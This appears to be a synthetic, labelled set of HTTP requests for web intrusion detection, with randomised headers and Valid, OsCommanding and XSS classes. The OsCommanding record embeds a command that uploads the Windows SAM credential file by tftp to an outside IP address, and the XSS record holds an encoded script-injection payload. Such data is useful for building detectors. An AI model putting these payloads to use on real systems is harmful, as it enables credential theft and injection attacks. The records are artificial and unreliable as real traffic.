Range: 31980-045
Referer: http://cjlkAIi.st/mirisq/od7nrd/ofyhmTp.gif
TE: trailers,deflate,gzip;q=0.4
Trailer: Pragma
User-Agent: khPetafLlbkwlNeoa
UA-CPU: StrongARM
UA-Disp: 7626,126,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5151x4689
Via: HTTP/6.8 217.125.41.8, 1.4 www.ehaTrf.js, HTTP/6.1 www.Trud.png
Transfer-Encoding: identity
Upgrade: 5Dytss/2.7
Warning: 670 www.Exsed.png "1tr73sd" 
X-Forwarded-For: 215.26.89.210
X-Serial-Number: 74914
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27971
Start - Id: 44595
class: OsCommanding
GET /1tpsho4/ol/3tjrntsoherTmd/oXsLpmdFGkNvkE/oaI.TgR/P9Gstdinnjj7tn.js?eoehejlirene9l=4n&rscqnrs4=8uteit%28o2h&na=%7EosF&hrItdem=LeeeEsEh&lErnm5nWi=m&jgeeau3affd=6l&nutdtp0tmS5axaq=733RV%40&afrfttttw3=EEdhiiseen5j&Rsg5dnxH=1Gj.moqDwpo8&tnSc=from%3Dsxp_alllaowgetrcTall%7Cszo9netcat&h2Nqhbtto=apHL%40TWF5.H&em=8.197.229.237+%7C+++tftp+-i++150.32.88.39++PUT+sam._&eu9flsat2enea1=fIbS HTTP/1.0
Host: www.Yiloomsrkt.net
Connection: keep-alive
Accept: application/*;q=0.8, video/quicktime, application/*;q=0.8
Accept-Charset: x-mac-greek;q=0.0, x-mac-arabic
Accept-Encoding: deflate;q=0.3, identity;q=0.4
Accept-Language: hbnog-mDL
Cache-Control: no-store
Client-ip: 73.204.181.30
Cookie: hmv3sgeceThac=46;ao=dyopt&otkr-on
Cookie2: $Version="4"
Date: Mon, 22 Aug 05 12:23:38 GMT
ETag: W/"EceresNnukYMbJqcg@"
Expect: 100-continue
From: fn96a@esnteln.biz
If-Modified-Since: Sat, 31 Oct 09 05:38:24 UTC
If-Unmodified-Since: Tue, 04 Nov 08 06:34:13 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 06 Apr 04 14:46:39 GMT
Max-Forwards: 7947
MIME-Version: 1.7
Pragma: dmpst='nohhosV'
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: Digest nc=D2e0c8B1
Range: -2578
Referer: http://www.8mTY.uk/itpe/6dahich/ncoNzaee/iwP9te.php3
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: iqal (paTAg_bQ)
UA-Disp: 802,727,16
UA-Color: color32
UA-Pixels: 905x8117
Via: 1.3 www.drhp.htm, 6.8 237.35.251.140
Transfer-Encoding: snj8; nicerN=hnu2rds
Upgrade: irceh/7.1, rtal/2.6, Iaf/5.7
Warning: 163 11.52.180.138 "nstees" "Wed, 05 Apr 06 04:07:30 UTC"
X-Forwarded-For: 84.212.52.145
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44595
Start - Id: 22802
class: Valid
GET /tsoah9tesrwdgih7fi/bTtGW1DdUh6odAJoH9V/ohJaIV4ME9XZxi/oack/rmaVAwafl6nseelh/o0A2S1/de5ilys7en7ou/nCxbKF@Udocp7l0L9F/ginabrycoee4od/bxpyopiaoAmpkl1nlom.jpeg?dn=qrtzsnythEntt3&1oteZPm-Zh=92&zstmg=ior%402tan2err&TESDn@a3=7Ev-Lkc3tj&w8umanm7on7=017&pIeeDLaoRecN7aw=0177&fase9Teeeeurd=yhiesiNswaRes5elg&mnreLntxO4o9n=8634&8e=931&ehtaag5xeit=deo%3E&isep4ItpeSa2=taadmin%7Cn&nxusiryaestqrhr=+sEeLapasswdeegdhd%29eD HTTP/1.0
Host: 101.20.45.180
Connection: close
Accept: image/gif
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.3
Accept-Language: aReet-oWInGe;q=0.6, ge-ita;q=0.8
Cache-Control: no-store
Client-ip: 154.4.232.145
Cookie: vLMXS=5269;y7NYYLrSHd6=oTaiw;eto=otmrCuz5o3n5woSm;nheontnhee=n7Ob;noeGenotm=aSBUS
Cookie2: $Version="420"
Date: Thu, 28 May 09 21:23:16 GMT
ETag: W/"b_GAB-zN.T7Dt.299aQ-"
Expect: 2eoada=0nu4enkH
From: Ar5ho@jaaeat.fr
If-Modified-Since: Fri, 23 Feb 07 17:23:29 CET
If-Unmodified-Since: Wed, 04 Jun 08 14:19:02 UTC
If-Match: "skR0SzHMr_zg3-rU_bz"
If-None-Match: *
If-Range: Fri, 27 Jun 08 07:45:34 CET
Max-Forwards: 0
MIME-Version: 2.3
Pragma: eei2ida='Gyxry'
Proxy-Authorization: NTLM cnJvbmhocDhlZXhpRVN0MW5vZWk5Y21wdGF0Z3RjYXdldDR3ZQ==
Authorization: NTLM bWc4ZjNyZWxhbGVyb2Vkb3R1ZXVjT2QxZWVyc2VuYThjaTFsckFkdGkydW5seXM=
Range: -637
Referer: http://Et1ie.fr/8eiwgone/tinri/nGes6i/7ieyp.tiff
TE: deflate,deflate;q=0.1,trailers
Trailer: Transfer-Encoding
User-Agent: h-PoFf6 http://www.jenOitbh.fr
UA-CPU: 68000
UA-Disp: 335,445,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 396x8159
Via: HTTP/2.1 www.bliv5Es.tiff
Transfer-Encoding: compress
Upgrade: senhmd/7.2, ea02/3.8
Warning: 552 www.2namiaEo.jpg:01754 "eaywa5bed" 
X-Forwarded-For: 143.162.53.229
X-Serial-Number: 3049600663
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22802
Start - Id: 29919
class: Valid
GET /ri4ytexta/ev/sJpMfR@ZmkhHmDb6qtD9/c-Npynxj_/emvieTibhism/sndaictmoRel8c5e/zK0pMI75I/veframyoohi/el04MBln6mc7.BvuxK6/lBu2/zY9KIW3F50M/1ssre.shtml?etcj=0638&t0rrxaec=4056&be4ddioareribk=zSiaL&eiu=reC6Q&1cnhhq64ofpdaS=sNR0N%40UK8&p3OnwreS0=iho&uetccoq=5&Siod=2487275458&i485tinqy=2&hfo=ja HTTP/1.0
Host: 44.87.77.140
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-turkish, cp-936, x-mac-arabic;q=0.1, iso-8859-8;q=0.7, euc-cn;q=0.0
Accept-Encoding: compress;q=0.8, identity;q=0.3, gzip, gzip, gzip;q=0.3
Accept-Language: qaO5it6o-oe;q=0.5
Cache-Control: min-fresh=8252
Client-ip: 63.141.168.199
Cookie: npgs3R9=ltktoimghcea/ae:nhosw;D79Wk.= O 'Se6execeHEe)wsh;gepairtsm3Thcb=Y3qsan;iaegdmhsol3=mptbee?1o
Cookie2: $Version="87"
Date: Thu, 26 Apr 07 03:30:35 UTC
ETag: W/"7MRCAMCo4sZHzVITp"
Expect: 100-continue
From: enAenar@sxZibNudi.uk
If-Modified-Since: Sat, 18 Feb 06 18:28:26 CET
If-Unmodified-Since: Fri, 24 Feb 06 11:58:11 GMT
If-Match: "fjiItmRyijDn50_m-6H"
If-None-Match: *
If-Range: "Ry4hcx9ln_QFPXNUXMgz"
Max-Forwards: 78
MIME-Version: 0.6
Pragma: ltonrm='tHtsp'
Proxy-Authorization: meaud m7h0u=nztdpF
Authorization: Digest cnonce="g0ozi9"
Range: 73-062771
Referer: http://vhdru.org/rnmxy/cn0p5wn.cfm
TE: trailers,deflate,chunked
Trailer: Pragma
User-Agent: Mozilla/6.1 (Windows; U; WinNT 1.5; i9-nb; rv:0.8.1) Gecko/58400340
UA-CPU: 68000
UA-Disp: 5197,782,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 3101x221
Via: HTTP/7.3 www.ooeeain.html
Transfer-Encoding: eeYrny; kwaeeqax=sqtt
Upgrade: onb4/4.3, rcs/3.8, osine/7.9
Warning: 638 www.lba6espt.jpeg:1313 "DhxO" 
X-Forwarded-For: 180.53.116.218
X-Serial-Number: 89410
----: ------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 29919
Start - Id: 27268
class: Valid
GET /Jr/ewLN_WP8LpnO/uNmO0@Ab/ap.eHK-T2VKXb46ywSi/rf.ySLzFLF/8WOmsiZ78IooyXO/Ts/q8@mEF0nDKnjgK4os7/ek@@iWP.png?nolg=5xOu_Bq3bq7&k9q3Vp=wdhavingenad2+hbMir&okg=qosew1ttrd&rktm=rGi1j63ix0&5rl4gstoeh0aLeo=o2LXQhCi1eC HTTP/1.0
Host: www.mILeshaa.it:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1253, x-mac-cyrillic;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 163.125.16.115
Cookie: ncbKLuiMservices=aGD;Izxarnnoa6n6uet=Euj;ay6n=g$9B;bog=Sh$gtu<>u0ewhere;eessamCr(
Cookie2: $Version="931"
Date: Thu, 08 Feb 07 24:50:40 GMT
ETag: "7JUjHZa@ZZr.UhdzC"
Expect: 100-continue
From: gaiiee@uheOc.uk
If-Modified-Since: Tue, 25 Jul 06 24:11:42 CET
If-Unmodified-Since: Tue, 19 May 09 09:47:14 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 23 Mar 08 06:45:57 GMT
Max-Forwards: 7041
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.yonersA.it/viliere/nase/ataasc/2ehf/a6te.js
Authorization: Digest nonce
Range: -1406,-35468,397-4525
Referer: /eesrut/adx2her.tar
TE: gzip;q=0.0,deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: rDBOd4nw2 http://www.thhghcyi.biz
UA-CPU: 68000
UA-Disp: 4717,242,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8847x8709
Via: FTP/6.2 72.55.239.149, FTP/6.1 27.193.24.242:95, grq/0.8 www.lyiot.css
Transfer-Encoding: coYswT; oeimrt=tgeuzpab
Upgrade: abeo/1.7, hNice/0.8, onao/1.2, i1n/2.5, rho/8.7
Warning: 782 www.Uhsrchsr.jpg "soB0oaE" "Wed, 08 Nov 06 06:46:53 GMT"
X-Forwarded-For: 137.209.141.242
X-Serial-Number: 75164077038098175
----: ----------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 27268
Start - Id: 32027
class: Valid
GET /ozxpassthruXwZgQIs/ihndsn/ecg2mZYc84/6nmm.swf?eMhagdenbl=75815243&eo5lid=817609302&fpChaving.@4=Ndddw5eimuesQ&lhseleanEa1Ete=htacces%3CperltkxdocumenteltotTkf+&nlonlm4dAtsg=ctGef&in7l=vSDb9Vl-i3L&RlandpW3=yn&r6whjh=1331&6e8gfr=15837&Rme=Ranm9nntSln&wc-8YCVpMG=6tohhn&ievsfelikDoe3t=e0MNVVSGIkc&Qcgboot.inidIVKXL.=9083214509&vajtdc=567 HTTP/1.0
Host: www.pa9iecseti.biz
Connection: keep-alive
Accept: */*
Accept-Charset: windows-874;q=0.8, x-mac-arabic, koi8, iso-8859-7, macintosh
Accept-Encoding: deflate;q=0.8, identity
Accept-Language: *;q=0.1
Cache-Control: ta78cza='cts'
Client-ip: 182.200.144.214
Cookie: aagta3biys=rraNyp
Cookie2: $Version="1"
Date: Sun, 22 Feb 04 01:32:09 UTC
ETag: W/"@X@DT03pmjgqM0jQofm"
Expect: 100-continue
From: hMpeNchu@otttmeoI6.st
If-Modified-Since: Sat, 15 Mar 08 07:21:38 GMT
If-Unmodified-Since: Mon, 19 Oct 09 13:13:43 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: tonnot ptrdtoe=7tift
Authorization: hxEO 8ehj0hse=isIzt
Range: 805-
Referer: http://www.eooaa.cz/NuoHeit/aCeg/Ttjag/wfRo/dwJmy5w.jpeg
TE: trailers,chunked;q=0.6
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.1 (compatible; MSIE 7.4; Win 9x; crni; 5ytla1)
UA-CPU: x86
UA-Disp: 0659,464,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8661x2250
Via: teh/3.8 www.8lybo9.css
Transfer-Encoding: deflate
Upgrade: idoj/6.1, g7eoil/4.7, cotot/9.8, ewrnb/5.4, 2axs/6.7
Warning: 611 www.uungucau.gif:10 "qeieeBwFo" 
X-Forwarded-For: 34.245.202.84
X-Serial-Number: 16576925520335
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32027
Start - Id: 16023
class: Valid
GET /eEualnanwn1cenLRaoe1/tnt3rdcgnd3thEi/7hlme25/at455t/63awjewneepeceohkr/hsvpvxa9ure/twmorKPi4gLYCh/qtspti.htm?scfisSlypni=io%2FeeYde&esolaah4rko=557&neo0ri4bcla=zmahinput&VLM30mailo_Wt22=td&tNnrs1on4tlmca=lgtNLnueosa&rtap3ea8cnfd=SbrUi&umrm=1345&qwtazNth8=7203059&0heatieiiwsic=539536&MUidrop@WpassthrulLeMn=oivjrs%3Aea&aanny=951422963 HTTP/1.1
Host: 151.241.183.255:80
Connection: snmdduD
Accept: audio/x-wav
Accept-Charset: koi8-r;q=0.8
Accept-Encoding: identity
Accept-Language: *
Cache-Control: max-age=0008
Client-ip: 251.149.33.159
Cookie: Iip4s76Jastece=Olocationludentwg)ezee@wef;tdIsrugieu=b62KuK9V0;hshttrco=68;venslxwD=frg;3eanlze3ckt=eFsrxelfnhmteR
Cookie2: $Version="932"
Date: Thu, 31 Jan 08 08:07:43 GMT
ETag: "d_0jC2jHellSi@2BxW"
Expect: ah7eSoau
From: ioDenuTw@Aree.gov
If-Modified-Since: Fri, 30 Dec 05 06:45:28 CET
If-Unmodified-Since: Sun, 05 Feb 06 07:58:32 GMT
If-Match: "NkdBX-pf_gK3qdsx"
If-None-Match: "2DP.QdeAlQMe1QUK@.Ri"
If-Range: "ZknCJn_hWMmHRilPHjVh"
Max-Forwards: 15
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic c3NyTnplOmlkcm9vNnI=
Authorization: Basic ZWVubW9lZXQ6bWUyYW9z
Range: 120-88552
Referer: /elhne/rn13ake.pl
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/1.0 (Machintosh; U; Mac OS X 9.8; la-ye; rv:4.9.2) Gecko/81160190
UA-CPU: MIPS
UA-Disp: 049,9339,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 273x3585
Via: FTP/8.0 www.iohelY.jpg:4392, FTP/0.4 216.3.151.249:164, FTP/9.3 116.118.151.232
Transfer-Encoding: identity
Upgrade: pnhh/6.6, iweta/0.9, 8roie/6.1
Warning: 192 www.smdny5nu.gif "em7hryt" "Wed, 17 Mar 10 12:26:18 GMT"
X-Forwarded-For: 199.28.224.223
X-Serial-Number: 72597578959631
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16023
Start - Id: 9421
class: Valid
GET /cVyBq3-L-/e.5aA225-QJN65/CLRi.R/ou/yS4unZD/w3u4tossate/iUBUtBx/sO.aspx? HTTP/1.1
Host: www.u0ursrvaac.de
Connection: rsmtNo
Accept: */*;q=0.1
Accept-Charset: windows-874;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 190.80.78.33
Cookie: script._u=nF6traHohnjilp;dreahtLAgo=enrlx>icu
Cookie2: $Version="956"
Date: Sat, 24 Oct 09 04:39:29 UTC
ETag: W/"MNe5uuHCWGFg_INZ"
Expect: ocotaoi=r9hl
From: xx0art8v@nico4.be
If-Modified-Since: Wed, 30 Aug 06 21:54:58 UTC
If-Unmodified-Since: Tue, 22 Aug 06 15:01:07 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 92
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM aDRla2V1NHNzZ3RuZHJOb29QaGFlZ2ZpNFNhb0N0aGFyaGFPZWhsbnV3
Authorization: Basic ZTJ1OGVlZjpzZDBodA==
Range: 15-64208,-25827,5343-67434
Referer: /vhalott/erlyrgg.css
TE: trailers,trailers
Trailer: Referer
User-Agent: elwb (eAx.gI2V; nRY3cQ; zBhiDx2HrM; iVADg1O4)
UA-CPU: 68000
UA-Disp: 849,768,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 413x817
Via: 1.3 www.haalvit.png, 7.6 www.desTtd.js
Transfer-Encoding: deflate
Upgrade: n1s/5.5, lmwiso/3.8, Tal9/6.5, E6Ia/4.3
Warning: 452 187.79.238.59 "essopd" 
X-Forwarded-For: 89.84.41.1
X-Serial-Number: 637220700897
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9421
Start - Id: 7975
class: Valid
PUT /0nhtLvi5el3clett/f5S/xPZfkCYdx0/oKsXG4jZya8.msf? HTTP/1.0
Content-Length: 89
Content-Language: a2o8Zei,8n
Content-Encoding: gzip
Content-Location: http://www.anseatr.org/Twtahn4/z0ety/dtjo/96bbns/73Taswr.pl
Content-MD5: b2llb2VuMGVzRmlrbnNIYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Jul 09 18:33:45 GMT
Last-Modified: Mon, 08 Jun 09 12:14:04 CET
Host: www.ahis2tN.cz:9709
Connection: TMtk
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: chFTA-es;q=0.9, i-heeeer8
Cache-Control: no-cache
Client-ip: 75.162.183.217
Cookie: M054homeFJ=tP0VIi;eeetaThTsgnfst=944;ehl8tl9naap7Hrs=8?nf\>=p
Cookie2: $Version="4"
Date: Thu, 01 Apr 10 10:46:34 UTC
ETag: "vSwg.t8VN@YH431HW"
Expect: a9oS8=esntrd
From: yfhn@Lkilct.com
If-Modified-Since: Sat, 02 Aug 08 22:13:16 CET
If-Unmodified-Since: Sun, 01 Oct 06 23:00:47 CET
If-Match: *
If-None-Match: "E@CeRKIdnKoyNa6n"
If-Range: Mon, 16 Nov 09 14:48:42 UTC
Max-Forwards: 2
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic NnR0ZXg6MWppamloaWg=
Authorization: Basic ZXBjZmVoQzU6bWV3ZQ==
Range: -607
Referer: http://www.iNbeArih.uk/ntlo/as6tona.php3
TE: trailers,gzip,deflate;q=0.6
Trailer: User-Agent
User-Agent: nbeubmoleilNaokpe
UA-CPU: x86
UA-Disp: 4676,8640,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 094x6003
Via: FTP/6.8 229.231.218.49, HTTP/1.0 www.sopeeiee.html
Transfer-Encoding: deflate
Upgrade: rRndxQ/4.8, m7j2ro/0.4, xec/7.9, aPodde/0.0, lld/6.5
Warning: 583 50.58.211.108 "lh5crmtllesSieanni" "Mon, 08 Jan 07 08:44:59 UTC"
X-Forwarded-For: 8.49.98.213
X-Serial-Number: 56493
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~

QcOHUhmeevalCnf=04751964&QGib7qBN=hm0z&elouvt=ioAot\te8hso2a@v&os=12&sa3e0anhe=257631

End - Id: 7975
Start - Id: 47289
class: XSS
GET /altlesednwiodbt/ldefbpe0hndhnad0ce/c5K0.V/kDVuR/eglmytdrtsr/gt5CTsEm-dPnuj.png?FOEisarrs=0841656&5eqelooson=732365&ZiPformw=h%40ohs+&7Gosf=%3Cxml+++id++++%3D+%22X++++%22%3E%3Ca+%3E%3Cb+++%3E%26lt%3Bscript++++%3E%5Balert+++%28%27nadt%27%29%3B%5D%26lt%3B%2Fscript%3E%3B%3C%2Fb+++%3E%3C%2Fa%3E%3C%2Fxml+%3E&nss=uo5itynSktae%2Bs HTTP/1.0
Host: 146.51.31.171
Connection: close
Accept: image/*;q=0.8, application/*
Accept-Charset: us-ascii
Accept-Encoding: identity;q=0.5, gzip;q=0.1, compress
Accept-Language: h-7gatutec;q=0.1, ibe-ym2trr;q=0.1, tJ0lt-auaihhrn;q=0.2, s4s-a;q=0.3
Cache-Control: only-if-cached
Client-ip: 156.129.47.155
Cookie: eoerD4qyssti=oey4$
Cookie2: $Version="2"
Date: Tue, 05 May 09 22:52:06 UTC
ETag: W/"Jj1djgJNibVZPR0W8"
Expect: 100-continue
From: peTeu9@mayraae.fr
If-Modified-Since: Thu, 04 Sep 08 21:09:08 GMT
If-Unmodified-Since: Sun, 07 Dec 08 11:56:45 UTC
If-Match: *
If-None-Match: "jhav@snYxsBoqBJs8YJ"
If-Range: Thu, 18 May 06 01:02:06 GMT
Max-Forwards: 7
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic d2VheToxTGVmZQ==
Range: -4,7256-5,39-5314
Referer: /Tr7axe/bttha/p98n/RIanrcm2.php3
TE: gzip
Trailer: Accept-Encoding
User-Agent: wtpAezh/6.3.6
UA-CPU: x86
UA-Disp: 3073,5344,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 979x278
Via: 0.1 75.95.34.184:322
Transfer-Encoding: identity
Upgrade: mtnf/1.5
Warning: 047 125.243.221.59 "FolaPnotvWe1rchha" 
X-Forwarded-For: 136.201.136.92
X-Serial-Number: 41548117703
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 47289
Start - Id: 28431
class: Valid
GET /eFg1J5PZ./s5raw/t4z@1o8jbFTCkV/QQz9DoK01Zs/rlnMtinsiiuntryhs/o7eedtnql5uTt/oikttiasgrKoufsnN3c.nsf?tmer4rn=cnum&Abcrnnht1psa=2495423&hvgs6exece=524323 HTTP/1.0
Host: 179.203.141.65:7281
Connection: h6des
Accept: image/*
Accept-Charset: windows-874;q=0.3, iso-8859-1, windows-1251;q=0.3, iso-8859-15
Accept-Encoding: *;q=0.2
Accept-Language: asAh-csh;q=0.1, jbs-mnctjr
Cache-Control: max-stale=74907
Client-ip: 45.193.13.12
Cookie: cylouL7h=between]qo ttt  ranhtpassrO&e ;Abt=19;seasg=0428877554;kQlLcumnzpr1=str
Cookie2: $Version="983"
Date: Mon, 09 Feb 04 23:43:46 CET
ETag: "0TNONsD1PZ41Clf1@c"
Expect: 100-continue
From: oBcae9t@txO3eond.biz
If-Modified-Since: Sun, 16 Dec 07 01:32:50 UTC
If-Unmodified-Since: Sun, 17 Jan 10 19:09:36 UTC
If-Match: "kQ3x3YnBza8ocsD"
If-None-Match: "Vf9rz3fgwjot.tHNmii"
If-Range: "8lelqa@6lZ7DKC146WD"
Max-Forwards: 410
MIME-Version: 2.8
Pragma: n=htfeneC
Proxy-Authorization: lewce SsheN=temsyl
Authorization: oibrl aaoH=eeyon
Range: 840682-12
Referer: http://eBlv.gov/sdIdsbry.tiff
TE: trailers
Trailer: Accept-Encoding
User-Agent: hHstHhow (eGl2Klxu; 3EFB-M)
UA-CPU: 68000
UA-Disp: 7568,4542,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3420x5548
Via: sh7ke/6.6 www.drsXt.jpeg
Transfer-Encoding: ellnmt
Upgrade: 7t3eo/4.1, aetae/9.1, fEe/9.1, shiotn/1.3, jNe/2.0
Warning: 767 www.EeowrQT.jpg "t1heot" 
X-Forwarded-For: 7.153.57.18
X-Serial-Number: 15983235
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28431
Start - Id: 374
class: Valid
GET /.kfk4/ugctLtv5eYaP.mspx?eagnrenyoi8=819&YYtwBvphpSXG@=7&oo=j&leEouhtuo=d+lns&urt=m%24tb&Q7ABO=5&UejEod=unionp HTTP/1.0
Host: www.8rsteX.uk
Connection: keep-alive
Accept: audio/x-wav;q=0.6, video/*
Accept-Charset: x-mac-korean, gb2312;q=0.4, iso-8859-2, x-mac-arabic, x-mac-arabic;q=0.6
Accept-Encoding: identity
Accept-Language: ieumnos-twpso72D, elqMs-jT;q=0.8, fEi84-eaeMllaw;q=0.6
Cache-Control: no-transform
Client-ip: 197.140.152.87
Cookie: RW76qLE9=05213;elink_JcW.8bTLR=aRFiIvuwYAjP;between1s-ynI8yd@=0316;6xdejeoEDene=;>cd2tmponosamo4s
Cookie2: $Version="75"
Date: Fri, 08 Feb 08 21:28:13 CET
ETag: W/"qN046fEpv6REy5KApOF"
Expect: caxlro
From: 7osi@ddydoOhs.net
If-Modified-Since: Mon, 04 Apr 05 06:06:56 GMT
If-Unmodified-Since: Fri, 04 Feb 05 04:37:54 UTC
If-Match: "pBXzMeFi9ZJ8-w-f4hG"
If-None-Match: "N@bTnUGkWboYrWk0"
If-Range: "YO2abdhF4cFZz-za"
Max-Forwards: 94
MIME-Version: 0.4
Pragma: p='Wai'
Proxy-Authorization: Digest username="iWrams"
Authorization: Basic ZWdydDpzZW5SV3RDYQ==
Range: 60-95,-13,615-290
Referer: /sSeorggv/eueo/ztpcge/Sddd/onish.php3
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/5.5 (compatible; Konqueror/1.6; Mac OS X; iusxgiece)
UA-CPU: StrongARM
UA-Disp: 4410,166,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0397x2303
Via: 1.9 www.bseehwto.gif, 1.6 185.197.253.219
Transfer-Encoding: gzip
Upgrade: sc3s/5.1, dtoP7n/7.1, ndxl/8.8
Warning: 019 www.rqism.png "eeerrEetourerTuu" 
X-Forwarded-For: 16.205.89.126
X-Serial-Number: 8963689877727
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 374
Start - Id: 16243
class: Valid
GET /9e/eneesianisk3deeh/snN/.ksL58s/wjwget/1tye4mlostu3o/Z0jRema/e.W_ebyFe8/N0JyesamWnB/itoDq.htm? HTTP/1.0
Host: www.q2Wqne.st
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-3, euc-jp, windows-1257;q=0.2
Accept-Encoding: compress
Accept-Language: yea5-tal0, Nf4v-roh, inea-ihte
Cache-Control: only-if-cached
Client-ip: 82.64.224.213
Cookie: bcT0=7;so1mDAtyti=4;dat5ttVc7=Eenkhmeu;Aaiieldtte=ere6safTwfI
Cookie2: $Version="29"
Date: Mon, 17 May 04 02:10:52 UTC
ETag: W/"gNCq3mNsM6TGRkGh"
Expect: uEyAr
From: clnnpbsn@3sAt82e8ca.it
If-Modified-Since: Wed, 14 Mar 07 16:24:19 GMT
If-Unmodified-Since: Thu, 01 Jan 09 09:33:17 CET
If-Match: *
If-None-Match: "rzy3vyS4heE9XV7hjvpw"
If-Range: Sat, 17 Jan 09 12:29:54 UTC
Max-Forwards: 6566
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest username="sldh8rh"
Authorization: Basic b3Nhc3R1OmJtYWU4ZHQ=
Range: 385223-,606-,069-73
Referer: /eeaeicG/re9cpa.zip
TE: chunked;q=0.0,deflate;q=0.6
Trailer: Max-Forwards
User-Agent: rgr9ptt/3.0.5.6.5
UA-CPU: 68000
UA-Disp: 595,008,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2602x876
Via: FTP/1.3 47.113.158.178, 6.3 57.63.218.15, 4.7 187.113.145.103
Transfer-Encoding: deflate
Upgrade: nysit/9.1, rnf/8.6, enSRLt/9.3, tIaii/5.9
Warning: 151 www.ot795bbe.tiff "yofcba7d9o" 
X-Forwarded-For: 136.200.162.240
X-Serial-Number: 1613720445559
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16243
Start - Id: 11104
class: Valid
GET /aledwwnrr4tnehI4NaE/ao/cgzVeK_Bu3/iASsV0NuH0KLx0gMW/kZaPCIdppWIR2J/uHe1ecapsonotemrtsc/d18jv8c./6wfVjj/ordv-S2PT4jFOuF/exbeyep3rIldeiaf/austROdonndTgbt.asmx? HTTP/1.0
Host: 4.194.176.87
Connection: keep-alive
Accept: text/xml;q=0.6, text/html, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: sc-bet01ilz;q=0.4, ia-hnqsiNh;q=0.0
Cache-Control: no-transform
Client-ip: 44.219.160.250
Cookie: katcl=a;s0tf1RealS7=xodggonRxuehTineet;hai=oshto;mejE=1388
Cookie2: $Version="559"
Date: Tue, 06 Jun 06 09:30:12 GMT
ETag: "2H7HIvjv993.E_Kr"
Expect: ltslh
From: lQbqTa@Erdtpio.net
If-Modified-Since: Wed, 06 Jun 07 06:54:00 GMT
If-Unmodified-Since: Sun, 22 Apr 07 05:04:24 GMT
If-Match: *
If-None-Match: "iP.pcBcGhOPMJ2Y1"
If-Range: *
Max-Forwards: 54
MIME-Version: 0.1
Pragma: rrhuaaws=o
Proxy-Authorization: Basic dXdhbnRlOmlzb28x
Authorization: amitk ne2iTaL=rHsy
Range: 7-30,-07477
Referer: http://www.gendru.org/D7gew.exe
TE: trailers,chunked,deflate;q=0.9
Trailer: From
User-Agent: Mozilla/4.6 (X11; U; Linux i386 2.4; im-Oa; rv:2.8.1) Gecko/76617441
UA-CPU: 68000
UA-Disp: 8798,283,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4624x463
Via: HTTP/1.3 123.30.190.185, 7.9 252.53.195.111
Transfer-Encoding: sah5xh
Upgrade: tpe/6.5, gcicT/8.5, saeuc/5.2, o9a/8.9, lLotu/0.7
Warning: 890 225.36.216.127 "thcgttar0olaoaknweu" 
X-Forwarded-For: 199.237.53.206
X-Serial-Number: 96723
----: ------------
~~~~~: ~~~~~~~~~~

null

End - Id: 11104
Start - Id: 380
class: Valid
